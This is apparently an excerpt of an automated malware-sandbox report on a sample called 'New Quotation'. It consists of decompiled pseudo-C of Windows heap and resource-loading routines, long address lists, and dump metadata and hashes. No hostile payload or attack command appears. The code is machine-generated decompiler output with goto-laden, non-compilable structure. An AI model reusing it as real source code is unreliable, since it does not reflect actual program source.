							_t286 =  *_t409 & 0x0000ffff;
							_v16 = _t286;
							while(1) {
								__eflags = _t286 -  *((intOrPtr*)(_t400 + 4));
								if(_t286 <  *((intOrPtr*)(_t400 + 4))) {
									break;
								}
								_t288 =  *_t400;
								__eflags = _t288;
								if(_t288 == 0) {
									_t286 =  *((intOrPtr*)(_t400 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t400 + 4)) - 1;
									break;
								} else {
									_t400 = _t288;
									_t286 =  *_t409 & 0x0000ffff;
									continue;
								}
							}
							E1D7E036A(_t416, _t400, 1, _t357, _t286, _v16);
							goto L21;
						}
					}
					L6:
					_push(0);
					_push( *_t398);
					_push(_t264);
					_push(_t357);
					_t322 = 0xd;
					E1D895FED(_t322, _t416);
					goto L7;
				}
			}




















































































                                                                                                                                                                                          0x1d7e1eb2
                                                                                                                                                                                          0x1d7e1ebb
                                                                                                                                                                                          0x1d7e1ebf
                                                                                                                                                                                          0x1d7e1ece
                                                                                                                                                                                          0x1d7e1ed0
                                                                                                                                                                                          0x1d7e1ed4
                                                                                                                                                                                          0x1d7e1f91
                                                                                                                                                                                          0x1d7e1f3d
                                                                                                                                                                                          0x1d7e1f3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1eee
                                                                                                                                                                                          0x1d7e1ef2
                                                                                                                                                                                          0x1d7e1ef7
                                                                                                                                                                                          0x1d7e1f04
                                                                                                                                                                                          0x1d835b5c
                                                                                                                                                                                          0x1d835b5f
                                                                                                                                                                                          0x1d835b5f
                                                                                                                                                                                          0x1d7e1f04
                                                                                                                                                                                          0x1d7e1f0a
                                                                                                                                                                                          0x1d7e1f0d
                                                                                                                                                                                          0x1d7e1f12
                                                                                                                                                                                          0x1d835b69
                                                                                                                                                                                          0x1d835b6c
                                                                                                                                                                                          0x1d835b6f
                                                                                                                                                                                          0x1d835b71
                                                                                                                                                                                          0x1d835b74
                                                                                                                                                                                          0x1d835b77
                                                                                                                                                                                          0x1d835b7a
                                                                                                                                                                                          0x1d835b7c
                                                                                                                                                                                          0x1d835c9f
                                                                                                                                                                                          0x1d835c9f
                                                                                                                                                                                          0x1d835ca1
                                                                                                                                                                                          0x1d835ca5
                                                                                                                                                                                          0x1d835ca6
                                                                                                                                                                                          0x1d835ca9
                                                                                                                                                                                          0x1d835caa
                                                                                                                                                                                          0x1d835caf
                                                                                                                                                                                          0x1d835caf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835caf
                                                                                                                                                                                          0x1d835b82
                                                                                                                                                                                          0x1d835b84
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835b8d
                                                                                                                                                                                          0x1d835b90
                                                                                                                                                                                          0x1d835b96
                                                                                                                                                                                          0x1d835b98
                                                                                                                                                                                          0x1d835bc3
                                                                                                                                                                                          0x1d835bc3
                                                                                                                                                                                          0x1d835bc6
                                                                                                                                                                                          0x1d835bc9
                                                                                                                                                                                          0x1d835bcb
                                                                                                                                                                                          0x1d835bce
                                                                                                                                                                                          0x1d835bd2
                                                                                                                                                                                          0x1d835bf5
                                                                                                                                                                                          0x1d835bf5
                                                                                                                                                                                          0x1d835bf8
                                                                                                                                                                                          0x1d835bfb
                                                                                                                                                                                          0x1d835c04
                                                                                                                                                                                          0x1d835c0b
                                                                                                                                                                                          0x1d835c0e
                                                                                                                                                                                          0x1d835c11
                                                                                                                                                                                          0x1d835c13
                                                                                                                                                                                          0x1d835c16
                                                                                                                                                                                          0x1d835c18
                                                                                                                                                                                          0x1d835c18
                                                                                                                                                                                          0x1d835c1b
                                                                                                                                                                                          0x1d835c1b
                                                                                                                                                                                          0x1d835c16
                                                                                                                                                                                          0x1d835c28
                                                                                                                                                                                          0x1d835c2d
                                                                                                                                                                                          0x1d835c30
                                                                                                                                                                                          0x1d835c33
                                                                                                                                                                                          0x1d835c35
                                                                                                                                                                                          0x1d835c3c
                                                                                                                                                                                          0x1d835c40
                                                                                                                                                                                          0x1d835c60
                                                                                                                                                                                          0x1d835c65
                                                                                                                                                                                          0x1d835c42
                                                                                                                                                                                          0x1d835c58
                                                                                                                                                                                          0x1d835c5d
                                                                                                                                                                                          0x1d835c73
                                                                                                                                                                                          0x1d835c7a
                                                                                                                                                                                          0x1d835c7f
                                                                                                                                                                                          0x1d835c85
                                                                                                                                                                                          0x1d835c88
                                                                                                                                                                                          0x1d835c8c
                                                                                                                                                                                          0x1d835c8e
                                                                                                                                                                                          0x1d835c95
                                                                                                                                                                                          0x1d835c96
                                                                                                                                                                                          0x1d835c96
                                                                                                                                                                                          0x1d835c8c
                                                                                                                                                                                          0x1d835c33
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835bfb
                                                                                                                                                                                          0x1d835bd8
                                                                                                                                                                                          0x1d835bdd
                                                                                                                                                                                          0x1d835bdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835beb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835beb
                                                                                                                                                                                          0x1d835b9a
                                                                                                                                                                                          0x1d835ba7
                                                                                                                                                                                          0x1d835ba7
                                                                                                                                                                                          0x1d835baa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835b9f
                                                                                                                                                                                          0x1d835ba1
                                                                                                                                                                                          0x1d835ba3
                                                                                                                                                                                          0x1d835bb3
                                                                                                                                                                                          0x1d835bb3
                                                                                                                                                                                          0x1d835bb4
                                                                                                                                                                                          0x1d835bbe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835bbe
                                                                                                                                                                                          0x1d835ba5
                                                                                                                                                                                          0x1d835ba5
                                                                                                                                                                                          0x1d835bac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835bac
                                                                                                                                                                                          0x1d7e1f18
                                                                                                                                                                                          0x1d7e1f18
                                                                                                                                                                                          0x1d7e1f1b
                                                                                                                                                                                          0x1d7e1f1e
                                                                                                                                                                                          0x1d7e1f20
                                                                                                                                                                                          0x1d7e1f23
                                                                                                                                                                                          0x1d7e1f26
                                                                                                                                                                                          0x1d7e1f2b
                                                                                                                                                                                          0x1d7e1f96
                                                                                                                                                                                          0x1d7e1f98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1f9d
                                                                                                                                                                                          0x1d7e1fa0
                                                                                                                                                                                          0x1d7e1fa6
                                                                                                                                                                                          0x1d7e1fa8
                                                                                                                                                                                          0x1d7e1fd4
                                                                                                                                                                                          0x1d7e1fd4
                                                                                                                                                                                          0x1d7e1fd7
                                                                                                                                                                                          0x1d7e1fda
                                                                                                                                                                                          0x1d7e1fdc
                                                                                                                                                                                          0x1d7e1fdf
                                                                                                                                                                                          0x1d7e1fe3
                                                                                                                                                                                          0x1d7e20c0
                                                                                                                                                                                          0x1d7e20c5
                                                                                                                                                                                          0x1d7e20c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835cc0
                                                                                                                                                                                          0x1d835cc2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835cc2
                                                                                                                                                                                          0x1d7e1fe9
                                                                                                                                                                                          0x1d7e1fe9
                                                                                                                                                                                          0x1d7e1fec
                                                                                                                                                                                          0x1d7e1fef
                                                                                                                                                                                          0x1d7e201f
                                                                                                                                                                                          0x1d7e2026
                                                                                                                                                                                          0x1d7e2029
                                                                                                                                                                                          0x1d7e205a
                                                                                                                                                                                          0x1d7e205d
                                                                                                                                                                                          0x1d7e205f
                                                                                                                                                                                          0x1d7e205f
                                                                                                                                                                                          0x1d7e205d
                                                                                                                                                                                          0x1d7e2035
                                                                                                                                                                                          0x1d7e203a
                                                                                                                                                                                          0x1d7e203d
                                                                                                                                                                                          0x1d7e203f
                                                                                                                                                                                          0x1d7e2041
                                                                                                                                                                                          0x1d7e2048
                                                                                                                                                                                          0x1d7e204c
                                                                                                                                                                                          0x1d7e2071
                                                                                                                                                                                          0x1d7e207a
                                                                                                                                                                                          0x1d7e204e
                                                                                                                                                                                          0x1d7e204e
                                                                                                                                                                                          0x1d7e2053
                                                                                                                                                                                          0x1d7e2053
                                                                                                                                                                                          0x1d7e2089
                                                                                                                                                                                          0x1d7e2090
                                                                                                                                                                                          0x1d7e2095
                                                                                                                                                                                          0x1d7e209b
                                                                                                                                                                                          0x1d7e209e
                                                                                                                                                                                          0x1d7e20a2
                                                                                                                                                                                          0x1d7e20a8
                                                                                                                                                                                          0x1d7e20af
                                                                                                                                                                                          0x1d7e20b0
                                                                                                                                                                                          0x1d7e20b0
                                                                                                                                                                                          0x1d7e20a2
                                                                                                                                                                                          0x1d7e203f
                                                                                                                                                                                          0x1d7e1ff1
                                                                                                                                                                                          0x1d7e1ff4
                                                                                                                                                                                          0x1d7e1ff9
                                                                                                                                                                                          0x1d7e1ffd
                                                                                                                                                                                          0x1d7e2001
                                                                                                                                                                                          0x1d7e2006
                                                                                                                                                                                          0x1d7e200e
                                                                                                                                                                                          0x1d7e2012
                                                                                                                                                                                          0x1d7e1f40
                                                                                                                                                                                          0x1d7e1f46
                                                                                                                                                                                          0x1d7e1f49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1f71
                                                                                                                                                                                          0x1d835ceb
                                                                                                                                                                                          0x1d835cef
                                                                                                                                                                                          0x1d835cf4
                                                                                                                                                                                          0x1d835cfe
                                                                                                                                                                                          0x1d835d01
                                                                                                                                                                                          0x1d835d03
                                                                                                                                                                                          0x1d835d08
                                                                                                                                                                                          0x1d835d08
                                                                                                                                                                                          0x1d835d01
                                                                                                                                                                                          0x1d835d0d
                                                                                                                                                                                          0x1d835d11
                                                                                                                                                                                          0x1d835e61
                                                                                                                                                                                          0x1d835e61
                                                                                                                                                                                          0x1d835e64
                                                                                                                                                                                          0x1d835e67
                                                                                                                                                                                          0x1d835e69
                                                                                                                                                                                          0x1d835e6c
                                                                                                                                                                                          0x1d835e6f
                                                                                                                                                                                          0x1d835e72
                                                                                                                                                                                          0x1d835e74
                                                                                                                                                                                          0x1d835cd6
                                                                                                                                                                                          0x1d835cd6
                                                                                                                                                                                          0x1d835cd8
                                                                                                                                                                                          0x1d835cda
                                                                                                                                                                                          0x1d835cdb
                                                                                                                                                                                          0x1d835cdc
                                                                                                                                                                                          0x1d835cde
                                                                                                                                                                                          0x1d835ce0
                                                                                                                                                                                          0x1d835ce1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835ce1
                                                                                                                                                                                          0x1d835e7a
                                                                                                                                                                                          0x1d835e7c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835e85
                                                                                                                                                                                          0x1d835e88
                                                                                                                                                                                          0x1d835e8e
                                                                                                                                                                                          0x1d835e90
                                                                                                                                                                                          0x1d835ebb
                                                                                                                                                                                          0x1d835ebb
                                                                                                                                                                                          0x1d835ebe
                                                                                                                                                                                          0x1d835ec1
                                                                                                                                                                                          0x1d835ec3
                                                                                                                                                                                          0x1d835ec6
                                                                                                                                                                                          0x1d835eca
                                                                                                                                                                                          0x1d835eed
                                                                                                                                                                                          0x1d835eed
                                                                                                                                                                                          0x1d835ef0
                                                                                                                                                                                          0x1d835ef3
                                                                                                                                                                                          0x1d835efc
                                                                                                                                                                                          0x1d835f03
                                                                                                                                                                                          0x1d835f06
                                                                                                                                                                                          0x1d835f09
                                                                                                                                                                                          0x1d835f0b
                                                                                                                                                                                          0x1d835f0e
                                                                                                                                                                                          0x1d835f10
                                                                                                                                                                                          0x1d835f10
                                                                                                                                                                                          0x1d835f13
                                                                                                                                                                                          0x1d835f13
                                                                                                                                                                                          0x1d835f0e
                                                                                                                                                                                          0x1d835f20
                                                                                                                                                                                          0x1d835f25
                                                                                                                                                                                          0x1d835f28
                                                                                                                                                                                          0x1d835f2b
                                                                                                                                                                                          0x1d835f2d
                                                                                                                                                                                          0x1d835f34
                                                                                                                                                                                          0x1d835f38
                                                                                                                                                                                          0x1d835f58
                                                                                                                                                                                          0x1d835f5d
                                                                                                                                                                                          0x1d835f3a
                                                                                                                                                                                          0x1d835f50
                                                                                                                                                                                          0x1d835f55
                                                                                                                                                                                          0x1d835f6b
                                                                                                                                                                                          0x1d835f72
                                                                                                                                                                                          0x1d835f77
                                                                                                                                                                                          0x1d835f80
                                                                                                                                                                                          0x1d835f84
                                                                                                                                                                                          0x1d835f86
                                                                                                                                                                                          0x1d835f8d
                                                                                                                                                                                          0x1d835f8e
                                                                                                                                                                                          0x1d835f8e
                                                                                                                                                                                          0x1d835f84
                                                                                                                                                                                          0x1d835f2b
                                                                                                                                                                                          0x1d835f95
                                                                                                                                                                                          0x1d835f98
                                                                                                                                                                                          0x1d835f9c
                                                                                                                                                                                          0x1d835fa3
                                                                                                                                                                                          0x1d835fa8
                                                                                                                                                                                          0x1d835fb4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835fb4
                                                                                                                                                                                          0x1d835ed0
                                                                                                                                                                                          0x1d835ed5
                                                                                                                                                                                          0x1d835ed7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835ee1
                                                                                                                                                                                          0x1d835ee3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835ee3
                                                                                                                                                                                          0x1d835e92
                                                                                                                                                                                          0x1d835e9f
                                                                                                                                                                                          0x1d835e9f
                                                                                                                                                                                          0x1d835ea2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835e97
                                                                                                                                                                                          0x1d835e99
                                                                                                                                                                                          0x1d835e9b
                                                                                                                                                                                          0x1d835eab
                                                                                                                                                                                          0x1d835eab
                                                                                                                                                                                          0x1d835eac
                                                                                                                                                                                          0x1d835eb6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835eb6
                                                                                                                                                                                          0x1d835e9d
                                                                                                                                                                                          0x1d835e9d
                                                                                                                                                                                          0x1d835ea4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d17
                                                                                                                                                                                          0x1d835d17
                                                                                                                                                                                          0x1d835d1a
                                                                                                                                                                                          0x1d835d1d
                                                                                                                                                                                          0x1d835d1f
                                                                                                                                                                                          0x1d835d22
                                                                                                                                                                                          0x1d835d25
                                                                                                                                                                                          0x1d835d28
                                                                                                                                                                                          0x1d835d2a
                                                                                                                                                                                          0x1d835e4d
                                                                                                                                                                                          0x1d835e4d
                                                                                                                                                                                          0x1d835e4f
                                                                                                                                                                                          0x1d835e53
                                                                                                                                                                                          0x1d835e54
                                                                                                                                                                                          0x1d835e57
                                                                                                                                                                                          0x1d835e58
                                                                                                                                                                                          0x1d835e5d
                                                                                                                                                                                          0x1d835e5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835e5d
                                                                                                                                                                                          0x1d835d30
                                                                                                                                                                                          0x1d835d32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d3b
                                                                                                                                                                                          0x1d835d3e
                                                                                                                                                                                          0x1d835d44
                                                                                                                                                                                          0x1d835d46
                                                                                                                                                                                          0x1d835d71
                                                                                                                                                                                          0x1d835d71
                                                                                                                                                                                          0x1d835d74
                                                                                                                                                                                          0x1d835d77
                                                                                                                                                                                          0x1d835d79
                                                                                                                                                                                          0x1d835d7c
                                                                                                                                                                                          0x1d835d80
                                                                                                                                                                                          0x1d835da3
                                                                                                                                                                                          0x1d835da3
                                                                                                                                                                                          0x1d835da6
                                                                                                                                                                                          0x1d835da9
                                                                                                                                                                                          0x1d835db2
                                                                                                                                                                                          0x1d835db9
                                                                                                                                                                                          0x1d835dbc
                                                                                                                                                                                          0x1d835dbf
                                                                                                                                                                                          0x1d835dc1
                                                                                                                                                                                          0x1d835dc4
                                                                                                                                                                                          0x1d835dc6
                                                                                                                                                                                          0x1d835dc6
                                                                                                                                                                                          0x1d835dc9
                                                                                                                                                                                          0x1d835dc9
                                                                                                                                                                                          0x1d835dc4
                                                                                                                                                                                          0x1d835dd6
                                                                                                                                                                                          0x1d835ddb
                                                                                                                                                                                          0x1d835dde
                                                                                                                                                                                          0x1d835de1
                                                                                                                                                                                          0x1d835de3
                                                                                                                                                                                          0x1d835dea
                                                                                                                                                                                          0x1d835dee
                                                                                                                                                                                          0x1d835e0e
                                                                                                                                                                                          0x1d835e13
                                                                                                                                                                                          0x1d835df0
                                                                                                                                                                                          0x1d835e06
                                                                                                                                                                                          0x1d835e0b
                                                                                                                                                                                          0x1d835e21
                                                                                                                                                                                          0x1d835e28
                                                                                                                                                                                          0x1d835e2d
                                                                                                                                                                                          0x1d835e33
                                                                                                                                                                                          0x1d835e36
                                                                                                                                                                                          0x1d835e3a
                                                                                                                                                                                          0x1d835e3c
                                                                                                                                                                                          0x1d835e43
                                                                                                                                                                                          0x1d835e44
                                                                                                                                                                                          0x1d835e44
                                                                                                                                                                                          0x1d835e3a
                                                                                                                                                                                          0x1d835de1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835da9
                                                                                                                                                                                          0x1d835d86
                                                                                                                                                                                          0x1d835d8b
                                                                                                                                                                                          0x1d835d8d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d99
                                                                                                                                                                                          0x1d835d48
                                                                                                                                                                                          0x1d835d55
                                                                                                                                                                                          0x1d835d55
                                                                                                                                                                                          0x1d835d58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d4d
                                                                                                                                                                                          0x1d835d4f
                                                                                                                                                                                          0x1d835d51
                                                                                                                                                                                          0x1d835d61
                                                                                                                                                                                          0x1d835d61
                                                                                                                                                                                          0x1d835d62
                                                                                                                                                                                          0x1d835d6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d6c
                                                                                                                                                                                          0x1d835d53
                                                                                                                                                                                          0x1d835d53
                                                                                                                                                                                          0x1d835d5a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835d5a
                                                                                                                                                                                          0x1d835d11
                                                                                                                                                                                          0x1d7e1f8b
                                                                                                                                                                                          0x1d7e1f8b
                                                                                                                                                                                          0x1d7e1f4b
                                                                                                                                                                                          0x1d7e1f50
                                                                                                                                                                                          0x1d7e1f52
                                                                                                                                                                                          0x1d7e1f57
                                                                                                                                                                                          0x1d7e1f64
                                                                                                                                                                                          0x1d7e1f6b
                                                                                                                                                                                          0x1d835cce
                                                                                                                                                                                          0x1d835ccf
                                                                                                                                                                                          0x1d835cd0
                                                                                                                                                                                          0x1d835cd1
                                                                                                                                                                                          0x1d835cd2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835cd2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1faa
                                                                                                                                                                                          0x1d7e1faa
                                                                                                                                                                                          0x1d7e1fad
                                                                                                                                                                                          0x1d7e1fb0
                                                                                                                                                                                          0x1d7e1fb0
                                                                                                                                                                                          0x1d7e1fb3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1fb5
                                                                                                                                                                                          0x1d7e1fb7
                                                                                                                                                                                          0x1d7e1fb9
                                                                                                                                                                                          0x1d7e1fc5
                                                                                                                                                                                          0x1d7e1fc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1fbb
                                                                                                                                                                                          0x1d7e1fbb
                                                                                                                                                                                          0x1d7e1fbd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1fbd
                                                                                                                                                                                          0x1d7e1fb9
                                                                                                                                                                                          0x1d7e1fcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1fcf
                                                                                                                                                                                          0x1d7e1fa8
                                                                                                                                                                                          0x1d7e1f2d
                                                                                                                                                                                          0x1d7e1f2d
                                                                                                                                                                                          0x1d7e1f2f
                                                                                                                                                                                          0x1d7e1f33
                                                                                                                                                                                          0x1d7e1f34
                                                                                                                                                                                          0x1d7e1f37
                                                                                                                                                                                          0x1d7e1f38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e1f38

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                          • Opcode ID: b9c080aaea2a08c8360f0f8ae035a5826296736d9e2d6d16f843b1fa24b71c84
                                                                                                                                                                                          • Instruction ID: b5b0c857d1e4dcbc6d336f60a015706cabef520221bb12f20c3d619b8b7d008d
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9c080aaea2a08c8360f0f8ae035a5826296736d9e2d6d16f843b1fa24b71c84
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93221F70A04246EFD701CF28C480BBABBB5FF45714F15C599E9498B682D735F981CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DB9C0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D7DB9C0(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				intOrPtr* _v188;
				char _v189;
				char _v190;
				intOrPtr _v196;
				signed int _v200;
				signed short _v204;
				signed int _v205;
				signed int _v208;
				void* _v209;
				void* _v212;
				void* _v213;
				signed short _v216;
				void* _v220;
				void* _v225;
				void* _v228;
				void* _v232;
				void* _v240;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				signed short _t150;
				void* _t152;
				signed int _t154;
				signed short _t155;
				signed short _t168;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t188;
				char _t190;
				signed int* _t192;
				signed char* _t193;
				signed int _t196;
				signed int _t206;
				void* _t207;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				intOrPtr _t219;
				signed int _t223;
				signed short _t239;
				void* _t243;
				signed int _t245;
				void* _t246;
				signed int _t247;
				signed int _t249;

				_t249 = (_t247 & 0xfffffff8) - 0xcc;
				_v8 =  *0x1d8cb370 ^ _t249;
				_v180 = __ecx;
				_t146 = __edx;
				_t229 = 0;
				_v188 = _a12;
				_t210 = _a4;
				_t245 = 0;
				_v168 = __edx;
				_v196 = 0xc00b0001;
				_v184 = 0;
				_v204 = 0;
				_v189 = 0;
				_v200 = 0;
				_v176 = 0;
				_v164 = 0;
				_v190 = 0;
				if(_t210 != 3) {
					__eflags = _t210 - 4;
					if(__eflags == 0) {
						goto L1;
					}
					_t168 = 0xc00000f1;
					L29:
					_pop(_t243);
					_pop(_t246);
					_pop(_t207);
					return E1D814B50(_t168, _t207, _v8 ^ _t249, _t229, _t243, _t246);
				}
				L1:
				_t15 = _t146 + 8; // 0xff1075ff
				_v160 =  *_t15 & 0x0000ffff;
				_v205 = _t229;
				while(1) {
					L2:
					_t211 = _a8;
					while(1) {
						L3:
						_v172 = _t245;
						_t206 = _t211 & 0x01000000;
						if(_t206 != 0) {
							goto L38;
						}
						L4:
						_t149 = _t245;
						_t245 = _t245 + 1;
						if(_t149 == 0) {
							_t150 = _v160;
							__eflags = _t150;
							if(__eflags == 0) {
								L35:
								_v204 = 0xeeee;
								while(1) {
									L3:
									_v172 = _t245;
									_t206 = _t211 & 0x01000000;
									if(_t206 != 0) {
										goto L38;
									}
									goto L4;
								}
								goto L38;
							}
							__eflags = _t150 - 0x400;
							if(__eflags == 0) {
								goto L35;
							}
							__eflags = _t150 - 0x800;
							if(__eflags == 0) {
								goto L35;
							}
							_t239 = _t150;
							_v204 = _t239;
							L13:
							if(_t239 == 0xeeee) {
								continue;
							}
							L14:
							_t148 = 0;
							if(_t229 != 0) {
								while(1) {
									__eflags =  *((intOrPtr*)(_t249 + 0x50 + _t148 * 2)) - _t239;
									if(__eflags == 0) {
										goto L3;
									}
									_t148 = _t148 + 1;
									__eflags = _t148 - _t229;
									if(__eflags >= 0) {
										goto L15;
									}
								}
								continue;
							}
							L15:
							_t262 = _t229 - 0x40;
							if(_t229 >= 0x40) {
								L28:
								_t168 = _v196;
								goto L29;
							}
							 *(_t249 + 0x54 + _t229 * 2) = _t239;
							_v156 = 0;
							_v200 = _t229;
							_t168 = E1D7DBDE0(_t206, _t239, _t245, _t262, _v180, _v204,  &_v184,  &_v156, _t211);
							_v216 = _t168;
							if(_t168 < 0) {
								__eflags = _t168 - 0xc000003a;
								if(_t168 == 0xc000003a) {
									L54:
									_t168 = 0xc00b0001;
									_v196 = 0xc00b0001;
									L44:
									__eflags = _t206;
									if(__eflags != 0) {
										goto L29;
									}
									_t229 = _v200;
									while(1) {
										L2:
										_t211 = _a8;
										goto L3;
									}
								}
								__eflags = _t168 - 0xc0000034;
								if(_t168 == 0xc0000034) {
									goto L54;
								}
								goto L44;
							}
							 *(_v168 + 8) = _t239 & 0x0000ffff;
							_v189 = 1;
							_t216 = E1D7DC6E0(_v184, _v168, 3, 0x2000030, _v188);
							_t183 = _a8 & 0x00000040;
							_v208 = _t216;
							_v184 = _t183;
							if(_t183 != 0) {
								__eflags = _t216;
								if(_t216 < 0) {
									L67:
									_t229 = _v184;
									_t184 = E1D7CA480(_v184);
									__eflags = _t184;
									if(_t184 != 0) {
										goto L28;
									}
									__eflags = _t206;
									if(__eflags != 0) {
										goto L28;
									}
									_t229 = _v200;
									while(1) {
										L2:
										_t211 = _a8;
										goto L3;
									}
								}
								_t216 = E1D7D872A(_v184,  *_v188, 0,  *((intOrPtr*)(_v168 + 0xc)), 0);
								_t188 = _v200;
								_v208 = _t216;
								__eflags = _t216;
								if(_t216 >= 0) {
									L20:
									_t219 =  *_t188;
									_t229 = _v184;
									if(_t219 <= _t229) {
										L82:
										_v196 = 0xc000007b;
										 *_t188 = 0;
										E1D85EF10(0x55, 2, "\'LDR: %s(), invalid image format of MUI file \n", "LdrpLoadResourceFromAlternativeModule");
										_t249 = _t249 + 0x10;
										__eflags = _t206;
										if(__eflags != 0) {
											_t168 = 0xc000007b;
											goto L29;
										}
										_t229 = _v200;
										while(1) {
											L2:
											_t211 = _a8;
											goto L3;
										}
									}
									_t190 = _v156;
									if(_t190 == 0 || _t219 < _t190 + _t229) {
										_t192 =  *( *[fs:0x30] + 0x50);
										if(_t192 != 0) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												goto L24;
											}
											_t193 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											L25:
											if(( *_t193 & 0x00000002) != 0) {
												__eflags = _v172;
												if(_v172 == 0) {
													__eflags = _a8 & 0x00000001;
													_t138 = (_a8 & 0x00000001) != 0;
													__eflags = _t138;
													_t196 = 3 + (0 | _t138) * 2;
												} else {
													_t196 = 9;
												}
												_t229 = _v168;
												E1D85F9AA(_v184, _v168, _a4, _t196);
											}
											if( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) != 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)))) = _v180;
											}
											goto L28;
										}
										L24:
										_t193 = 0x7ffe0385;
										goto L25;
									} else {
										_t188 = _v188;
										goto L82;
									}
								}
								 *_t188 = 0;
								L19:
								if(_t216 < 0) {
									goto L67;
								}
								goto L20;
							}
							_t188 = _v188;
							goto L19;
						}
						_t152 = _t149 - 1;
						if(_t152 == 0) {
							__eflags = _t239 - 0xeeee;
							if(__eflags != 0) {
								__eflags = _t211 & 0x00000004;
								if(__eflags != 0) {
									_t239 = 0xeeee;
									_t245 = 0xfffffffe;
									_v204 = 0xeeee;
									continue;
								}
								__eflags = _v160 & 0x000003ff;
								if(__eflags == 0) {
									goto L35;
								}
								_t154 = E1D7C88C8(_t239,  &_v204);
								_t211 = _a8;
								_t229 = _v200;
								__eflags = _t154;
								if(__eflags < 0) {
									L59:
									_t245 = 0xfffffffe;
									goto L35;
								}
								_t239 = _v204;
								__eflags = _t239;
								if(__eflags != 0) {
									_t245 = _v172;
									goto L13;
								}
								goto L59;
							}
							goto L35;
						}
						_t155 = _t152 - 1;
						if(_t155 != 0) {
							__eflags = _t155 == 1;
							if(_t155 == 1) {
								_t223 = _v164;
								__eflags = _t223;
								if(_t223 != 0) {
									L63:
									__eflags =  *_t223 - 0xfecdfecd;
									if(__eflags != 0) {
										L65:
										_t229 = _v200;
										_t239 = 0xeeee;
										_v204 = 0xeeee;
										while(1) {
											L2:
											_t211 = _a8;
											goto L3;
										}
